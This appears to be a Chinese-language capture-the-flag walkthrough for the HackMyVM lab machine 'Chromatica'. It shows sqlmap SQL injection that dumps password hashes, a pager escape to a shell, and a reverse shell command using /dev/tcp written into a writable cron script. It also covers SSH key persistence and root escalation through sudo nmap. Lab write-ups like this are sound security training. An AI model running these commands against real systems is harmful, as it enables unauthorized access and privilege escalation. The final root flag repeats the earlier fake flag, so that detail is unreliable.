简介
靶机名称:Chromatica
难度:简单
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Chromatica
本地环境
虚拟机:vitual box
靶场IP(Chromatica):192.168.56.115
跳板机IP(windows 11):192.168.56.1 192.168.190.100
渗透机IP(ubuntu 22.04):192.168.190.30
扫描
nmap起手,来了个5353端口
nmap -p 1-65535 -T4 -A -v 192.168.56.115/32
http
gobuster扫描目录
gobuster dir -u http://192.168.56.115/ -w $HVV_PATH/8_dict/SecLists-master/Discovery/Web-Content/directory-list-2.3-big.txt -b 402-404 -t 10 -x php,zip,bak,jpg,txt,html
在/robots.txt
路径下找到新路径
sql注入
将User-Agent改为dev
再访问该路径即可得到一个搜索界面
后面搜索没什么结果,随便塞个万能密码发现是sql注入
sqlmap一把梭,不过需要注意指定user-agent
sqlmap -u http://192.168.56.115/dev-portal/search.php\?city\= --method GET --user-agent="dev" -D Chromatica --dump-all
+----+----------------------------------+-----------+-----------------------------+
| id | password | username | description |
+----+----------------------------------+-----------+-----------------------------+
| 1 | 8d06f5ae0a469178b28bbd34d1da6ef3 | admin | admin |
| 2 | 1ea6762d9b86b5676052d1ebd5f649d7 | dev | developer account for taz |
| 3 | 3dd0f70a06e2900693fc4b684484ac85 | user | user account for testing |
| 4 | f220c85e3ff19d043def2578888fb4e5 | dev-selim | developer account for selim |
| 5 | aaf7fb4d4bffb8c8002978a9c9c6ddc9 | intern | intern |
+----+----------------------------------+-----------+-----------------------------+
这里理应爆破,但我的kali本爆不出来,其他几个字典也都半斤八两,所以还是cmd5付费消灾吧()
❯ ssh dev@192.168.56.115
dev@192.168.56.115's password:
GREETINGS,
THIS ACCOUNT IS NOT A LOGIN ACCOUNT
IF YOU WANNA DO SOME MAINTENANCE ON THIS ACCOUNT YOU HAVE TO
EITHER CONTACT YOUR ADMIN
OR THINK OUTSIDE THE BOX
BE LAZY AND CONTACT YOUR ADMIN
OR MAYBE YOU SHOULD USE YOUR HEAD MORE heh,,
REGARDS
brightctf{ALM0ST_TH3R3_34897ffdf69}
Connection to 192.168.56.115 closed.
得到假flag一枚(汗)
既然是我们是成功连接上的,有什么办法能让这连接保留下来?
首先把窗口缩小到无法一次性打印全部字符
然后在这时直接输入!bash
over
目录下的user.txt内容为brightctf{ONE_OCKLOCK_8cfa57b4168}
提权
定时任务利用
查看crontab
dev@Chromatica:/home$ cat /etc/crontab
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * analyst /bin/bash /opt/scripts/end_of_day.sh
发现会每分钟执行一次脚本,而且我们还有写入权限
dev@Chromatica:/opt/scripts$ ls -alh
total 12K
drwxrwxrwx 2 root root 4.0K Apr 18 07:57 .
drwxr-xr-x 6 root root 4.0K Apr 24 14:05 ..
-rwxrwxrw- 1 analyst analyst 30 May 15 14:00 end_of_day.sh
那没什么好说的了,攻击机起监听,shell脚本写上去
监听命令
rlwrap -cAr nc -lvvp 40001
反弹命令
bash -c "bash -i >& /dev/tcp/192.168.56.1/40001 0>&1"
ssh持久化
把我们攻击机的公钥写到 authorized_keys
中
analyst@Chromatica:~$ ssh-keygen
...
analyst@Chromatica:~$ cd .ssh
analyst@Chromatica:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClvG6svC2GWmvvZyP2dF1aWWsyDEfwoSCkaleG/VK38Dpzu4agS5FGrkZa2bnebp8LB1mdwEyUr8eq1RcApIDn8jhVaShDNj9EffzzCQWWnJ/1pEXJqmhgjkUvW5LngLTyrsAL2y4ko/zSNY4mebJxnfDc/COjl4u5Rh3PoV0GktC3b+9q4b3InVYjfTVrX77zi30zFhrmYT+0xpjfc1PUFmAqXiLx/zfDBTBAgOTrRZ098XZA63YsLV1YCQxc9iyIjyqJUjXD5lq70oMbub264BREBTFILmdLJQjVwctr/NdDn9TIeFLNBDXZzCGkpqCBUG4+VaqXL/gpQUCb/cJj0UMJBmRXfS0ltt1cWUlYkUb34hlSSrnbtdFkZYfkoZnrrQvJw86pMSO5HJah7XnZUlXQ7w47tloh/u6EW+zo0Q96wQ+SvHRE+XnhgKjQhpmcGWkU0Kw9u34MKS8T3g1uptopuHpa/XhBLah7poRtAtJsDDbVjcxlIW6XS2HT61s= root@koishi-reverse" >> authorized_keys
sudo -l提权
sudo -l查看权限
analyst@Chromatica:~$ sudo -l
Matching Defaults entries for analyst on Chromatica:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User analyst may run the following commands on Chromatica:
(ALL : ALL) NOPASSWD: /usr/bin/nmap
直接上gtfobins
找弹shell命令
执行成功弹到shell。不过输入的部分不知道重定向哪里去了怎样都看不到,反正盲打个cat /root/root.txt
就通关了
brightctf{ALM0ST_TH3R3_34897ffdf69}